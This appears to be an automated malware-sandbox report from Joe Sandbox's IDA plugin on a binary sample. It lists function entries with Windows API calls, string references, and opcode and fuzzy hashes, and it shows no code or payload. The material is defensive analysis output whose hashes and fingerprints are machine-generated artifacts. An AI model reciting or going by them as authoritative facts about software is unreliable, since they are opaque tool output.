                                                                                                                                                      • API String ID: 621844428-0
                                                                                                                                                      • Opcode ID: 9a5b07d50968f5a5a33a42041e89df66e587ce4be2ee540ab80df64da2c54726
                                                                                                                                                      • Instruction ID: de8a4150e3e2cf68bf20060b1f27a299a51b9094292f0d72657fac800c709e29
                                                                                                                                                      • Opcode Fuzzy Hash: 9a5b07d50968f5a5a33a42041e89df66e587ce4be2ee540ab80df64da2c54726
                                                                                                                                                      • Instruction Fuzzy Hash: 085117B2D041149BF7208B25DC45BFB7B79EF80310F1542BAE84DA2680E23D5AC5CB66
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: ?4:Z$L$L$W$a$a$b$d$i$o$r$r$y
                                                                                                                                                      • API String ID: 0-178481897
                                                                                                                                                      • Opcode ID: 2d0078a4e1718066b6bd25370331ff6b2c29aae98de2e60b0c2fda70ab3628cd
                                                                                                                                                      • Instruction ID: 9e29478c6255eedc6371b7b31605b7cf1d6ab259d432597406e054186138c5f6
                                                                                                                                                      • Opcode Fuzzy Hash: 2d0078a4e1718066b6bd25370331ff6b2c29aae98de2e60b0c2fda70ab3628cd
                                                                                                                                                      • Instruction Fuzzy Hash: CA5167A1D082949AF7218724DC417EB7A39DF90710F1481FED44D67681E6BE0FC68B27
                                                                                                                                                      APIs
                                                                                                                                                      • HeapSetInformation.KERNEL32(?,00000001), ref: 00415749
                                                                                                                                                      • _fast_error_exit.LIBCMT ref: 004157A3
                                                                                                                                                        • Part of subcall function 004156FB: __FF_MSGBANNER.LIBCMT ref: 00415709
                                                                                                                                                        • Part of subcall function 004156FB: __NMSG_WRITE.LIBCMT ref: 00415711
                                                                                                                                                      • _fast_error_exit.LIBCMT ref: 004157B4
                                                                                                                                                      • __amsg_exit.LIBCMT ref: 004157CD
                                                                                                                                                      • GetCommandLineW.KERNEL32(?,00000001), ref: 004157D3
                                                                                                                                                      • __wsetargv.LIBCMT ref: 004157E8
                                                                                                                                                      • __amsg_exit.LIBCMT ref: 004157F3
                                                                                                                                                      • __wsetenvp.LIBCMT ref: 004157F9
                                                                                                                                                      • __amsg_exit.LIBCMT ref: 00415804
                                                                                                                                                      • __cinit.LIBCMT ref: 0041580C
                                                                                                                                                      • __amsg_exit.LIBCMT ref: 00415817
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: __amsg_exit$_fast_error_exit$CommandHeapInformationLine__cinit__wsetargv__wsetenvp
                                                                                                                                                      • String ID: YSl$Yrh$W
                                                                                                                                                      • API String ID: 495375042-3553233420
                                                                                                                                                      • Opcode ID: 177d833bc692cd9b4f54a7efe97807f3b95ddf99724db6f4f477688eaf1752a8
                                                                                                                                                      • Instruction ID: 3ad2514ef2d4a8fb3d4db0986c40aef22871cecf875f56b9d18474f28f6ced5d
                                                                                                                                                      • Opcode Fuzzy Hash: 177d833bc692cd9b4f54a7efe97807f3b95ddf99724db6f4f477688eaf1752a8
                                                                                                                                                      • Instruction Fuzzy Hash: AD21D230A88714D6EB2477B29D877EE26746F40708F10402FFC25A91C2EFBC84C19A6E
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: L$L$W$a$a$b$d$i$o$r$r$y
                                                                                                                                                      • API String ID: 0-4069139063
                                                                                                                                                      • Opcode ID: 7ecc125851947807b28881be17fe346295ce7e30f9f6791f6214aa20b03f0186
                                                                                                                                                      • Instruction ID: 1fd2a57ec42fc069f9c9e6eb1f30a52e5e8cd407d5f5db1c86275cac6f09bb00
                                                                                                                                                      • Opcode Fuzzy Hash: 7ecc125851947807b28881be17fe346295ce7e30f9f6791f6214aa20b03f0186
                                                                                                                                                      • Instruction Fuzzy Hash: 30415AE2C08184DEF7218224DC457EB7B79DBD1714F1881FED44D25A82D67E1BCA8A27
                                                                                                                                                      APIs
                                                                                                                                                      • ExitProcess.KERNEL32(00000000,0040FCC1,0040FB1E,?,?,00432A9C), ref: 0040D7BE
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ExitProcess
                                                                                                                                                      • String ID: P
                                                                                                                                                      • API String ID: 621844428-3110715001
                                                                                                                                                      • Opcode ID: dfd3e73e43fb0de9aa0ebd2d874d64beb031c13ca9690b4ffd0a0cb83bbd051a
                                                                                                                                                      • Instruction ID: fd9b133df32bb7292ee0a0534e24d5bbfc4e221d87805b7341f3c622169aad27
                                                                                                                                                      • Opcode Fuzzy Hash: dfd3e73e43fb0de9aa0ebd2d874d64beb031c13ca9690b4ffd0a0cb83bbd051a
                                                                                                                                                      • Instruction Fuzzy Hash: 24E0D83190C2559EF3A00B24DC9C79FBF7CDB42714F5000B7D50AD60C1CB7D4A869912
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 4392ff6410eed9a53257134b9d64f32b32a4d3fbdded8eed35061b62c0e99df3
                                                                                                                                                      • Instruction ID: f56dd8d996ad5540ce26c9d5e4b3da27ddda79bf98cd93287bba5281d932ca75
                                                                                                                                                      • Opcode Fuzzy Hash: 4392ff6410eed9a53257134b9d64f32b32a4d3fbdded8eed35061b62c0e99df3
                                                                                                                                                      • Instruction Fuzzy Hash: BA5128B2D041249BF7208B28DC557FBBB79FF80314F1541BAD84DA2280E2396EC5CB56
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 4e0a38a36bb4056de32b79133cdefca6493cf2fe5669affa6d2f72c301395a41
                                                                                                                                                      • Instruction ID: 2c86de2936023d7158f63331d5a9febbe6d24f8d877cb46424d984690f9e0703
                                                                                                                                                      • Opcode Fuzzy Hash: 4e0a38a36bb4056de32b79133cdefca6493cf2fe5669affa6d2f72c301395a41
                                                                                                                                                      • Instruction Fuzzy Hash: 6B41E0B6D041249AE7248B15DC847FBB679EF90314F1482BBE80D76280E23D6FC1CB66
                                                                                                                                                      APIs
                                                                                                                                                      • ExitProcess.KERNEL32(00000000,0040FCC1,0040FB1E,?,?,00432A9C), ref: 0040D7BE
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ExitProcess
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 621844428-0
                                                                                                                                                      • Opcode ID: fc5cc2c6824b824c517dab8f29adb0fe622315edf1c1d8e05acc000b182b4f04
                                                                                                                                                      • Instruction ID: 367724127f3c5f72d6283c2e13d15ea392774b1bba65878750058da6416fddd6
                                                                                                                                                      • Opcode Fuzzy Hash: fc5cc2c6824b824c517dab8f29adb0fe622315edf1c1d8e05acc000b182b4f04
                                                                                                                                                      • Instruction Fuzzy Hash: 3911D362D14124ABF7204A16DC857EB7A79EB80725F1542BBD90D761C0E27C1FC1CA62
                                                                                                                                                      APIs
                                                                                                                                                      • ExitProcess.KERNEL32(00000000,0040FCC1,0040FB1E,?,?,00432A9C), ref: 0040D7BE
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ExitProcess
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 621844428-0
                                                                                                                                                      • Opcode ID: cef30995ae083f6fffe8e35d35d45c0faf8d082ef79d84690cd91c51c66baa61
                                                                                                                                                      • Instruction ID: 786c12c4dc23d80fc4d29d01d52a1b7e18d14177999a8bbab94840f6d880f48f
                                                                                                                                                      • Opcode Fuzzy Hash: cef30995ae083f6fffe8e35d35d45c0faf8d082ef79d84690cd91c51c66baa61
                                                                                                                                                      • Instruction Fuzzy Hash: 9E11E762E00024ABF7204A16DC447EBBB79EBC1725F1442BBD84D751C0E77C1BC2C951
                                                                                                                                                      APIs
                                                                                                                                                      • ExitProcess.KERNEL32(00000000,0040FCC1,0040FB1E,?,?,00432A9C), ref: 0040D7BE
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ExitProcess
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 621844428-0
                                                                                                                                                      • Opcode ID: d31ced8267479b584ffb8388a0bfab396d1382cbc9d5f63c5d446b4e000f7a80
                                                                                                                                                      • Instruction ID: f34ffc79aea0e517d4c31c4da36d93f25ff8cfaaf4e22df9459f5a6363e89d26
                                                                                                                                                      • Opcode Fuzzy Hash: d31ced8267479b584ffb8388a0bfab396d1382cbc9d5f63c5d446b4e000f7a80
                                                                                                                                                      • Instruction Fuzzy Hash: CEF059A3D041049AF7500A38DC0DBFB2A3CEBC0719F0541BBE80DA91C0E77D4ACA8826
                                                                                                                                                      APIs
                                                                                                                                                      • ExitProcess.KERNEL32(00000000,0040FCC1,0040FB1E,?,?,00432A9C), ref: 0040D7BE
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ExitProcess
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 621844428-0
                                                                                                                                                      • Opcode ID: 6ba20291a97b8dffbd88e1a324447bfb2ea3625d065f492f94a9b38716cde4dd
                                                                                                                                                      • Instruction ID: 69af0123669756491cbcc399246483ade6b4597816c4a2b2c55db5fb4c36c7ab
                                                                                                                                                      • Opcode Fuzzy Hash: 6ba20291a97b8dffbd88e1a324447bfb2ea3625d065f492f94a9b38716cde4dd
                                                                                                                                                      • Instruction Fuzzy Hash: 77F059B28085049BF3108B10DC8D3BB7739FB80316F2482BFD80AA65C0E77D29C69912
                                                                                                                                                      APIs
                                                                                                                                                      • ExitProcess.KERNEL32(00000000,0040FCC1,0040FB1E,?,?,00432A9C), ref: 0040D7BE
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ExitProcess
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 621844428-0
                                                                                                                                                      • Opcode ID: 12f118fbb239615395ea9538c912c5d4c94e8fbe4be552a81dfd1e0ce1bb7abf
                                                                                                                                                      • Instruction ID: 976f40e0c262d17d240ba049857bcc2b0c58b231ea4c786d867e3f99c7e49c76
                                                                                                                                                      • Opcode Fuzzy Hash: 12f118fbb239615395ea9538c912c5d4c94e8fbe4be552a81dfd1e0ce1bb7abf
                                                                                                                                                      • Instruction Fuzzy Hash: 5DF0E9E3D045445AF7500924DC0DBAB6A3CDBC0715F0441BAE80D655C0E77C1AC5C922
                                                                                                                                                      APIs
                                                                                                                                                      • ExitProcess.KERNEL32(00000000,0040FCC1,0040FB1E,?,?,00432A9C), ref: 0040D7BE
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ExitProcess
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 621844428-0
                                                                                                                                                      • Opcode ID: 4e20d53ad8376365945ab3ebb2b9f12874dcb86e56057a73c68a7eb45c99a3e5
                                                                                                                                                      • Instruction ID: 472463df7dc7515533e30ab1ad5dc97b63a568be39cababd7865ec33f77735c5
                                                                                                                                                      • Opcode Fuzzy Hash: 4e20d53ad8376365945ab3ebb2b9f12874dcb86e56057a73c68a7eb45c99a3e5
                                                                                                                                                      • Instruction Fuzzy Hash: 16F037E2C041049AF7504A14EC4A7BB752CEB80715F14457BD80EA41C0F77D6ECA9967
                                                                                                                                                      APIs
                                                                                                                                                      • ExitProcess.KERNEL32(00000000,0040FCC1,0040FB1E,?,?,00432A9C), ref: 0040D7BE
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ExitProcess
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 621844428-0
                                                                                                                                                      • Opcode ID: 4d946ee84461f20e6611a4a5294b83d1cab5594b581638b572cb52ed8f63f044
                                                                                                                                                      • Instruction ID: 41a703e8c68eb43c2289ed5718c4f48593ca50147ebefd7b8766e2d57271407b
                                                                                                                                                      • Opcode Fuzzy Hash: 4d946ee84461f20e6611a4a5294b83d1cab5594b581638b572cb52ed8f63f044
                                                                                                                                                      • Instruction Fuzzy Hash: 58F0E5E28081049FF7204A10DC897FB7A3CFB80725F2481BBE80E615C0E77D1AC68922
                                                                                                                                                      APIs
                                                                                                                                                      • ExitProcess.KERNEL32(00000000,0040FCC1,0040FB1E,?,?,00432A9C), ref: 0040D7BE
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ExitProcess
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 621844428-0
                                                                                                                                                      • Opcode ID: 4606904282755ca6b8a52a491e8596f29001fa7158d1d60903295552d60ef76f
                                                                                                                                                      • Instruction ID: 4fe0fe7e6e9e45ac4036d5c7278f99ec0fab1bb6b7f95b03918df05c6d1b342b
                                                                                                                                                      • Opcode Fuzzy Hash: 4606904282755ca6b8a52a491e8596f29001fa7158d1d60903295552d60ef76f
                                                                                                                                                      • Instruction Fuzzy Hash: 76F092E28041049BF7604A50DC4A7EB763CEB80716F1485BBD80EE45C0EBBD5EC68D27
                                                                                                                                                      APIs
                                                                                                                                                      • ExitProcess.KERNEL32(00000000,0040FCC1,0040FB1E,?,?,00432A9C), ref: 0040D7BE
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ExitProcess
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 621844428-0
                                                                                                                                                      • Opcode ID: fcde7fd86c028c5d188d605d8a5c099e2c5c6e521ec3781deed5696f3d057b19
                                                                                                                                                      • Instruction ID: 9bd1436980abe9389dca7793adfc9160e5d73a85d6ff86bdb935e657276dcbe0
                                                                                                                                                      • Opcode Fuzzy Hash: fcde7fd86c028c5d188d605d8a5c099e2c5c6e521ec3781deed5696f3d057b19
                                                                                                                                                      • Instruction Fuzzy Hash: 91D0A73194C18486F7911754CCB038EBF655F51745F1400FBC44DB51C1937A8F9B8507
                                                                                                                                                      APIs
                                                                                                                                                      • ExitProcess.KERNEL32(00000000,0040FCC1,0040FB1E,?,?,00432A9C), ref: 0040D7BE
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ExitProcess
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 621844428-0
                                                                                                                                                      • Opcode ID: fe224db4e1f4a368c28716439e4f7066e8414b30992a0ba0c97ca23ecbf60f4e
                                                                                                                                                      • Instruction ID: b12b89855ee4e669c3cbf46eb01707d99eeecf86db04606955205a1fa3747863
                                                                                                                                                      • Opcode Fuzzy Hash: fe224db4e1f4a368c28716439e4f7066e8414b30992a0ba0c97ca23ecbf60f4e
                                                                                                                                                      • Instruction Fuzzy Hash: 5BC04C36B443288BDBE49A45E8457E8F739EB84733F1001EAD90D912409F711DD4CE51
                                                                                                                                                      APIs
                                                                                                                                                      • ExitProcess.KERNEL32(00000000,0040FCC1,0040FB1E,?,?,00432A9C), ref: 0040D7BE
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ExitProcess
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 621844428-0
                                                                                                                                                      • Opcode ID: 3c3db34eb7781049176df19a5cc694f90a3ea73ed2e26338aa25eb99a13a7ad6
                                                                                                                                                      • Instruction ID: b6882c12cff54bfd9b859dee453dfe4b0a3268a62ad0403b98f454c0e73de424
                                                                                                                                                      • Opcode Fuzzy Hash: 3c3db34eb7781049176df19a5cc694f90a3ea73ed2e26338aa25eb99a13a7ad6
                                                                                                                                                      • Instruction Fuzzy Hash: FCC08C30A0C20842EB9117A1C848388BA795F90B01F000096C0082108087B646C58B01
                                                                                                                                                      APIs
                                                                                                                                                      • GetLocaleInfoW.KERNEL32(00000800,00000009,00000010,00000008), ref: 0040ED0A
                                                                                                                                                      • _swscanf.LIBCMT ref: 0040ED30
                                                                                                                                                      Strings
                                                                                                                                                      • Got Current OS Language (primaryLangID: %d subLangID: %d) which translates to EAD language %s, xrefs: 0040EE75
                                                                                                                                                      • H+C, xrefs: 0040EE66
                                                                                                                                                      • L+C, xrefs: 0040ED89
                                                                                                                                                      • d+C, xrefs: 0040EDB6
                                                                                                                                                      • Unknown current OS language. (defaulting to English), xrefs: 0040EE59
                                                                                                                                                      • `+C, xrefs: 0040EDC0
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InfoLocale_swscanf
                                                                                                                                                      • String ID: Got Current OS Language (primaryLangID: %d subLangID: %d) which translates to EAD language %s$H+C$L+C$Unknown current OS language. (defaulting to English)$`+C$d+C
                                                                                                                                                      • API String ID: 4240319459-3027554918
                                                                                                                                                      • Opcode ID: 8f6a36c9de7199f1bdbe89a798b914ed15667ce0543bdb7c782b75dfd403bd5a
                                                                                                                                                      • Instruction ID: fdad99bada8757720c833c82a8f7d6c6cf6eab86f3ecb27813d772bb7b7b4850
                                                                                                                                                      • Opcode Fuzzy Hash: 8f6a36c9de7199f1bdbe89a798b914ed15667ce0543bdb7c782b75dfd403bd5a
                                                                                                                                                      • Instruction Fuzzy Hash: B351B831604919C7D7209E6ED98066AF364EB48754F20893BF412E73C1D77DAD1687CE
                                                                                                                                                      APIs
                                                                                                                                                      • LoadResource.KERNEL32(?,?,?,?,?,0042D770), ref: 0040102B
                                                                                                                                                      • LockResource.KERNEL32(00000000,?,?,?,?,?,0042D770), ref: 0040103A
                                                                                                                                                      • SizeofResource.KERNEL32(?,?,?,?,?,?,?,0042D770), ref: 0040104B
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Resource$LoadLockSizeof
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2853612939-0
                                                                                                                                                      • Opcode ID: 2f20284f3294e2baed1ee4f9c24c77794bdb686d89e5afd298025a070179dce0
                                                                                                                                                      • Instruction ID: 3c230f17593eedadb8d1a25c334522914d9658cf97881ecee832d9e389989f04
                                                                                                                                                      • Opcode Fuzzy Hash: 2f20284f3294e2baed1ee4f9c24c77794bdb686d89e5afd298025a070179dce0
                                                                                                                                                      • Instruction Fuzzy Hash: EAF0963370012957CB306B79EC049BBB7DCDA917A63008577F989F76A0E539DCC582A8
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: N@
                                                                                                                                                      • API String ID: 0-1509896676
                                                                                                                                                      • Opcode ID: ae613e775dc3108c7db1608caa2314f256298117eddb46c225e56a1a9229931d
                                                                                                                                                      • Instruction ID: 46131d9779f233d169b6e074d7f52160adf2df670bc17c7086d440347f8f07bf
                                                                                                                                                      • Opcode Fuzzy Hash: ae613e775dc3108c7db1608caa2314f256298117eddb46c225e56a1a9229931d
                                                                                                                                                      • Instruction Fuzzy Hash: F1615A729003158FCB18CF48C49469EBBB2FF85314F5AC5AED8095B366C7B5998ACB84
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: N@
                                                                                                                                                      • API String ID: 0-1509896676
                                                                                                                                                      • Opcode ID: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
                                                                                                                                                      • Instruction ID: bdf6f9bd4e9c2b627aef2c7ac3213d55244daae19c05cd7de719fac592f1173e
                                                                                                                                                      • Opcode Fuzzy Hash: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
                                                                                                                                                      • Instruction Fuzzy Hash: 80615B729003158FCB18CF48C49469ABBF2FF85314F1AC5BED8095B366C7B5999ACB84
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: 7:EB
                                                                                                                                                      • API String ID: 0-1889068222
                                                                                                                                                      • Opcode ID: f0024cec74ebbbe9ed6354c5ecd8b92f223d080b1e3504fc3efe176741fe6241
                                                                                                                                                      • Instruction ID: a7ed0c96e2b368f480c50e53824cf43a1c1f7ef97a0af1023d6d51b4c014dd48
                                                                                                                                                      • Opcode Fuzzy Hash: f0024cec74ebbbe9ed6354c5ecd8b92f223d080b1e3504fc3efe176741fe6241
                                                                                                                                                      • Instruction Fuzzy Hash: 605128B2D05454ABE714CB54DC90AFF7779EB81305F28C1BBED49A2291CB3C5AC18E89
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 0556935cdc178c84ab3d19fc6851343a918f5e490f0f51218d4b1d9ca2ea2850
                                                                                                                                                      • Instruction ID: c3c4d9516621444ab7e0387ffe99d7b6317f0dd7a5a3bc1d0d1cdd7813ece101
                                                                                                                                                      • Opcode Fuzzy Hash: 0556935cdc178c84ab3d19fc6851343a918f5e490f0f51218d4b1d9ca2ea2850
                                                                                                                                                      • Instruction Fuzzy Hash: 75D19E35E0026ACFDF24CFA8D9906EEB7B1FF64300F95426AC815AB351D7785A46CB84
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                                      • Instruction ID: 4d8af5c93ff15b13b4fc166f70c7e948e7880cd261db61d00fb0d6653f235f6a
                                                                                                                                                      • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                                      • Instruction Fuzzy Hash: 7E112B77205C81C3D654866DD8B46F7A395FBC6320B3C43FBD0418BB58D23AA9C59D08
                                                                                                                                                      APIs
                                                                                                                                                      • LoadLibraryW.KERNEL32(?,00000010,?,?,?,?,00000000,00000000), ref: 00406849
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: LibraryLoad
